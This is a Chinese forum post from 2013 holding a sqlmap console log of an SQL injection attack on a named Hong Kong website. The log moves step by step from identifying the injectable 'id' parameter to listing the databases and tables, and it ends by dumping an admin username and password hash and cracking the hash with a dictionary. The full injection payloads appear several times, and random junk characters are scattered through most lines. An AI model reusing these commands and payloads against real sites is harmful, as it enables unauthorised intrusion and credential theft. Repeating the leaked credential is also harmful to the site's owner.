D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& u& G( \' Q) z* i' \* I& q
ms "Mysql" --current-user /* 注解:获取当前用户名称- `$ z( ?, D+ E8 G: F8 s! \
sqlmap/0.9 - automatic SQL injection and database takeover tool
" g* l6 C4 s; c% r! { http://sqlmap.sourceforge.net starting at: 16:53:54
2 v T. Y1 X$ B: R- S[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: ?, T9 T3 V8 r3 z" l session file
, p" J' B8 m3 d; P[16:53:54] [INFO] resuming injection data from session file8 E) ~+ f. b5 w; s
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
6 h5 H4 i; R: {9 D7 |) m _! ~- h[16:53:54] [INFO] testing connection to the target url
- c$ k& ]! u6 i# o/ [9 N/ i( Jsqlmap identified the following injection points with a total of 0 HTTP(s) reque/ @5 k+ \2 Y% a- g; Z+ K2 m, g
sts:& k$ O% f5 |4 O% f( }4 @9 ?
---
* l: M: z8 u8 U" A( ]: hPlace: GET) ^' |( @, a/ [( X$ `+ l: R _: |
Parameter: id- L9 x4 I5 {9 r/ P8 f2 C0 N3 m# u
Type: boolean-based blind
1 ~. M9 Z8 X+ d! I Title: AND boolean-based blind - WHERE or HAVING clause4 p# W% Z: {, P" |% i
Payload: id=276 AND 799=799* m1 Z3 e- o& G- L. \, R& R
Type: error-based' \1 N2 }) x7 R
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause0 C& {; o3 l7 Q7 D* Z. p
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
1 J% J0 \* o6 c1 P: K120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,589 J+ Z+ D7 n8 u E& U7 h
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
/ J) g# O3 K2 ~" @) P& Y5 y. B& X Type: UNION query/ ?8 m& }8 W! P3 [9 L
Title: MySQL UNION query (NULL) - 1 to 10 columns; ^# N/ a6 G* O3 L# ^ _( e' r
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 i# N, a) r7 q) O7 ^* K1 _
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ u. ?' x7 f0 G2 p8 v$ x/ mCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
* b& f1 |/ _& O& d6 e! V Type: AND/OR time-based blind
: x Q) c7 U7 C) f) K/ D Title: MySQL > 5.0.11 AND time-based blind
, w A h# L/ H9 \/ ~0 Z, T Payload: id=276 AND SLEEP(5)3 u2 R9 ]% s- S0 ^. Z) V, q$ a, L
---
8 M4 E: @$ U6 ~5 [4 H) \[16:53:55] [INFO] the back-end DBMS is MySQL
) E" v d" I1 V9 y' g% d: e/ p+ Hweb server operating system: Windows2 F: A; _8 s2 h8 b9 j& g( C
web application technology: Apache 2.2.11, PHP 5.3.0
5 V! O! n4 q; M8 n8 }# ~, Q4 Oback-end DBMS: MySQL 5.0( U5 f2 s" H3 d2 \6 a
[16:53:55] [INFO] fetching current user8 R' A% Y# H3 ^& _7 s, @+ ^% U# a/ f' O
current user: 'root@localhost'
( [0 K. l( Q" e! y[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou. X& J8 `* V3 L$ a6 L
tput\www.wepost.com.hk' shutting down at: 16:53:58
+ z9 q, m5 p8 D& }# g
3 j1 }3 u! h4 B3 DD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 Y \9 c9 }# I1 H& G' y
ms "Mysql" --current-db /*当前数据库
* w! d% X! U" c; @8 m+ V sqlmap/0.9 - automatic SQL injection and database takeover tool+ X6 T7 n+ `3 i4 F
http://sqlmap.sourceforge.net starting at: 16:54:16
$ C4 d# X( g ]5 U[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
# ~/ t& K! B7 B4 {: h7 } session file
& |% ?2 W0 F5 Z[16:54:16] [INFO] resuming injection data from session file
( a, \* j/ h$ @9 Q[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
' o- ^4 q9 j3 N; g[16:54:16] [INFO] testing connection to the target url1 x+ p8 h8 _2 H. ?% F
sqlmap identified the following injection points with a total of 0 HTTP(s) reque. ^, s# U' P1 P' d% {4 \! V
sts:
# k& N: D" p3 D$ P---% U. K# s, I& X* Z2 p+ ^8 `7 `5 a
Place: GET
* r2 I/ [% M) s5 TParameter: id
! |7 y0 E9 Z/ R3 Q- X+ ~" Q Type: boolean-based blind
0 w0 G4 y! Q$ d Title: AND boolean-based blind - WHERE or HAVING clause
9 P/ B+ `0 u# s Payload: id=276 AND 799=799
2 D& m9 X+ b2 j+ e Type: error-based
3 w6 H: `- t- P7 T Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 Y+ `8 Q5 M9 q2 G$ E6 ^) N; s Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 q8 Y; c& T+ i120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) v8 t' N3 z0 n3 p! w: k: ^5 s8 R
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- r+ G i8 W% a
Type: UNION query6 O+ ~5 @4 P8 i. T5 T! w
Title: MySQL UNION query (NULL) - 1 to 10 columns
7 x2 A7 f# e, S# Q+ G! |6 x" | Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
1 g; U; b& v6 Z9 j# G9 J! d(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; f; y; v( A4 h" fCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' L+ C# r5 r, `; {& Y Type: AND/OR time-based blind
, \. z5 |; ^4 L Title: MySQL > 5.0.11 AND time-based blind
1 o* J0 v5 ~+ W9 I. u- a Payload: id=276 AND SLEEP(5)$ d3 [, U; M* a3 u
---& ~0 @8 |6 \+ { h5 n; y
[16:54:17] [INFO] the back-end DBMS is MySQL
$ o* _; z$ [: b$ n- ?web server operating system: Windows6 P, g! o& X) K6 j4 z6 {! O, S' v% @
web application technology: Apache 2.2.11, PHP 5.3.0
; z& M/ `! y7 q$ T0 p- \back-end DBMS: MySQL 5.0! U7 h6 E# Z- h4 m$ E) n
[16:54:17] [INFO] fetching current database
+ Y, h8 `" S2 t' C$ j* Y% R' i# ncurrent database: 'wepost'
. w% m+ L |9 Q. @' b[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou% m' m4 ~1 F# N* _, G M) F' @
tput\www.wepost.com.hk' shutting down at: 16:54:18% o; q/ e( j O1 g( h/ W. X
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
4 z0 M/ B* [, [3 Tms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
0 J2 `9 F2 w* a$ W" C. X$ m4 \ sqlmap/0.9 - automatic SQL injection and database takeover tool. N& u- o) R, o/ x
http://sqlmap.sourceforge.net starting at: 16:55:25
) H) D- d9 q" a" I[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as4 ?; K- H0 u# @6 T9 Y
session file
3 B, |) G4 ^0 v) o4 P[16:55:25] [INFO] resuming injection data from session file, M/ S* \6 _8 d* ^* h# U
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
# o1 [2 e& U. ]1 u[16:55:25] [INFO] testing connection to the target url1 Q% {' t: J: F; Z0 x. S8 m
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 O# O& B' Y+ ]. f6 P* f3 jsts:! Z' t( C3 H1 d0 v# E
---2 O% }- F& V- K
Place: GET7 \+ }. A/ C; g' \9 i v
Parameter: id2 |% S: l& B/ E& ~5 L0 t
Type: boolean-based blind
5 A h, y: p# H5 ^( ], f; X Title: AND boolean-based blind - WHERE or HAVING clause5 J( b! `% I! w
Payload: id=276 AND 799=799& `, K: i5 W. Q; L3 `
Type: error-based
) M, k, ~* `1 }# h7 B4 ?3 o Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 z e1 J9 p9 Z6 f3 U Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ [4 |' [5 m& K/ c) B
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* F! w( p! l+ r1 K2 |+ T+ L
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ g! W5 I' A7 W# M/ \1 X
Type: UNION query
! _+ m) E$ [( g f Title: MySQL UNION query (NULL) - 1 to 10 columns
" d. |" y( S' _: N Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
9 i; q$ V% S; @; G(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( Q+ g* h. `6 C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
+ n! r# Z, J% l. G/ u. { Type: AND/OR time-based blind' i8 M. c1 U# ]
Title: MySQL > 5.0.11 AND time-based blind. n3 a' p0 o( W, S. U& U
Payload: id=276 AND SLEEP(5)3 ~! m5 g2 F1 o5 H( N
---
& i7 J% V @- c[16:55:26] [INFO] the back-end DBMS is MySQL. Q5 t, _7 P! F; [
web server operating system: Windows `4 p8 \- Q! k% E9 E
web application technology: Apache 2.2.11, PHP 5.3.0
$ F: z2 E8 U5 v Tback-end DBMS: MySQL 5.0
0 |8 M0 D+ j0 X$ S[16:55:26] [INFO] fetching tables for database 'wepost'+ m* J2 v' ?. `: a5 v" r _
[16:55:27] [INFO] the SQL query used returns 6 entries
5 M; D+ I" x: I+ n* B$ \1 kDatabase: wepost
% |, B% C/ E- s: m# \[6 tables]
# ]' W: e% A6 k+ h+-------------+* [5 P7 t$ }. @) m" e3 Z# n! j3 l
| admin |
1 D, I* E' t; G' _ x! G| article |
9 V; [" | R- p% f1 g| contributor |
& ~( C8 h) O4 `' p4 D4 q| idea |3 H4 K; y/ V' [! h
| image |
V. a4 q* J# R: `8 I( }) ]| issue |
" V2 {# Y1 {1 W& k. r8 _+-------------+
3 W& q& ^4 _) n1 r$ p4 |[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. D* H+ q" R) S2 l+ O0 R; `# d! I" a Ztput\www.wepost.com.hk' shutting down at: 16:55:33
: e- Z% V9 J8 b
, z' A: m6 t+ f- |5 D4 oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 U$ H+ A' q: V' L& ]! ?ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
$ ?; M3 F. L0 n% V& U: N: m sqlmap/0.9 - automatic SQL injection and database takeover tool2 ]+ J1 }3 g9 K1 P6 c7 ?
http://sqlmap.sourceforge.net starting at: 16:56:06
5 ]+ v4 m1 ~) N1 ?' O' Xsqlmap identified the following injection points with a total of 0 HTTP(s) reque
. B7 ?6 v1 g. p2 {5 `6 [ I3 Lsts:: H _# C- a7 J$ ]
---; e, f2 q4 _+ t7 U
Place: GET
% U3 d3 u- u5 @# Y2 qParameter: id
0 p# m' Q0 w ~. n8 f S Type: boolean-based blind/ F3 q" s# Q9 P% I5 k
Title: AND boolean-based blind - WHERE or HAVING clause
) I" I/ f, S" O Payload: id=276 AND 799=799& l( |9 c ]7 Q, `/ a
Type: error-based
# {" E! H: w- v Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
6 U; Y$ r0 Z. O2 Q7 _ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 D) a8 M) E. y( t6 a0 O+ ]1 T
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; v3 r% J; p& a2 L3 T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; C7 f( |( b8 f' `# P% `3 R Type: UNION query
" ]( j T8 ^& C7 k2 L% g4 B9 x& n Title: MySQL UNION query (NULL) - 1 to 10 columns$ v% u$ H( K! d
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ g# t& R5 E. k/ a! a- V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
s- d. a6 }/ l/ N, L& _CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#* Y8 d& y8 m: b6 |1 a3 O% ~( Y* a
Type: AND/OR time-based blind3 n8 q$ p( T! ~
Title: MySQL > 5.0.11 AND time-based blind* M* ^6 }0 L0 y6 h
Payload: id=276 AND SLEEP(5)3 u# v# B3 \% ^
---2 H' q3 Y4 v% y; [* N
web server operating system: Windows4 Z0 P1 P& ^8 W# }' b- \' W, Z$ M
web application technology: Apache 2.2.11, PHP 5.3.0" ~$ m2 X3 T. s2 B& R$ @
back-end DBMS: MySQL 5.0) ]3 ]( Y- X1 w G( e2 ~* I: p
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se( d5 |- o& T8 M* e, K5 v# p
ssion': wepost, wepost8 R& C& _1 b6 ~3 ]) k
Database: wepost
- _8 G/ C) j- f, R& XTable: admin
3 t$ S4 w9 Q9 ^( v[4 columns]
8 s! ~8 U+ N* E2 N' H+----------+-------------+/ Z$ N! H" p! I' f4 W! H7 o8 g
| Column | Type |, C% J8 d2 k% ] |* z- H
+----------+-------------+
% Q; f" e) {) @" G' U0 H1 Y, }| id | int(11) |
6 |5 E T0 E/ z2 _* [6 z' r ?| password | varchar(32) |# I0 r1 L" G4 k- k
| type | varchar(10) |+ _$ c2 S) R- U! b
| userid | varchar(20) |
) t, z' H Y4 V, @+----------+-------------+ G; J! o- J$ V# Y( P
shutting down at: 16:56:198 { B! i$ r/ ^' L2 m) U4 R; ~
; V: _2 d1 F+ \0 C+ l- V+ u$ T
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 z& K; B/ R$ B1 T
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
) D2 p( }% f) T4 I+ A0 L sqlmap/0.9 - automatic SQL injection and database takeover tool
/ L; v8 g8 k5 J0 u6 b7 d3 ` http://sqlmap.sourceforge.net starting at: 16:57:14
) E d4 D0 g+ w/ ~" c: G; B' m2 Gsqlmap identified the following injection points with a total of 0 HTTP(s) reque1 b2 a, E4 }8 ]; r
sts:! Q( d" K) N- B$ `; ~1 t. a" e
---
7 M }" H* }# @9 EPlace: GET) D3 V4 A: N4 w# k# {6 P. l
Parameter: id, f) z& Z5 y& t+ [' d
Type: boolean-based blind! q2 |+ [( r4 r0 B+ ^2 x2 K" Y1 F
Title: AND boolean-based blind - WHERE or HAVING clause
& I% ?7 d' ?! g0 L Payload: id=276 AND 799=799; A) O n7 q9 s3 a0 x7 G- q+ _
Type: error-based
7 y9 z' K' [: u( a Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 ]7 d/ k7 X! C" a: Z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 w, F1 E x5 i& G% K9 x9 k
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% L0 q+ x% H. W$ u: g
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) r3 W1 ^0 N; @4 k2 g1 Q# ^' X
Type: UNION query! b9 E$ R" N5 _1 O
Title: MySQL UNION query (NULL) - 1 to 10 columns
1 Y' M7 M) X8 | b% `4 c1 H4 b Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ B9 }2 N6 Q2 w
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, O1 ^' x) T8 J$ \" ]& f
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ |' [4 a- W: r5 c9 E7 l" A9 | Type: AND/OR time-based blind" K; i! J1 ^' {5 p. g/ V1 M8 A
Title: MySQL > 5.0.11 AND time-based blind
" h& ], n' f2 b7 ]6 T9 b Payload: id=276 AND SLEEP(5)/ C$ Z; m/ ?7 E5 ]3 ~5 S
---* B7 X B2 [# L4 j K
web server operating system: Windows
* ?5 l& F9 V6 w! ^* e' G* g" Pweb application technology: Apache 2.2.11, PHP 5.3.0/ |6 r( ]$ a# }# J
back-end DBMS: MySQL 5.05 |' t7 {# E+ f7 J) M: A" J
recognized possible password hash values. do you want to use dictionary attack o+ D2 I, m+ S n: D6 x" W( w
n retrieved table items? [Y/n/q] y6 I. Q) L9 }" I" u% v/ ? Z
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]1 W: V2 b m0 F
do you want to use common password suffixes? (slow!) [y/N] y
, n! b( k2 R. J! Y/ DDatabase: wepost3 w- T9 e- ~2 j* q6 v
Table: admin6 v `* m6 L8 s/ w; O D# B
[1 entry]
6 [; r1 G g- l- J9 w+----------------------------------+------------+" P* @6 s1 ^! s$ r; E
| password | userid |
4 S) @2 D" n. u1 s# Q3 {" A9 G+----------------------------------+------------+" k$ ~8 z+ p' _2 G* j4 F
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
' f7 s8 m8 m( G( c2 z/ W+----------------------------------+------------+
) x. x4 B- q, t/ h5 @0 v- ]8 R: n2 y9 v shutting down at: 16:58:14" y, @! h$ h7 n# Z, L7 \8 u
! c: U) G7 F# n; @
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对